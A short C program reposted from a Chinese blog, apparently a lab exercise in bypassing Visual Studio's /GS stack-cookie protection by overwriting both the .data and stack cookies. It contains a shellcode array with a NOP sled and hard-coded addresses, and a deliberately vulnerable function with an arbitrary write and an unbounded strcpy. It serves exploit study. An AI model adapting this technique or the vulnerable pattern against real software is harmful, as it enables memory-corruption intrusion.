1 /***名称:替换.data与栈cookie突破GS************/ 2 /***编译条件:vs2010,禁止优化选项,release版本***/ 3 /***实践:Hualian***************************/ 4 5 #include<stdafx.h> 6 #include<string.h> 7 #include<stdlib.h> 8 9 char Shellcode[]= 10 "\x90\x90\x90\x90" 11 "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" 12 "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" 13 "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" 14 "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" 15 "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" 16 "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" 17 "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" 18 "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" 19 "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" 20 "\x53\x68\x69\x61\x6e\x22\x68\x48\x75\x61\x6c\x8B\xC4\x53\x50\x50"//\x66\x61\x69\x6C 21 "\x53\xFF\x57\xFC\x53\xFF\x57\xF8" 22 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 23 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 24 "\xF0\x6F\x82\x90" 25 "\x90\x90\x90\x90" 26 "\x94\xFE\x12\x00"//\x91\x91\x91\x91 27 ; 28 29 void test (char *s, int i, char *src) 30 { 31 char dest[200]; 32 if(i<0x9995) 33 { 34 char *buf = s + i; 35 *buf = *src; 36 *(buf + 1) = *(src +1); 37 *(buf + 2) = *(src +2); 38 *(buf + 3) = *(src +3); 39 strcpy(dest,src); 40 } 41 } 42 43 void main() 44 { 45 char * str = (char*)malloc(0x10000); 46 printf("look"); 47 test(str, 0xFFFFAFBC/*待确定*/,Shellcode); 48 }
同时替换.data与栈中的Cookie突破GS,布布扣,bubuko.com
原文:http://www.cnblogs.com/MeiJi/p/3746625.html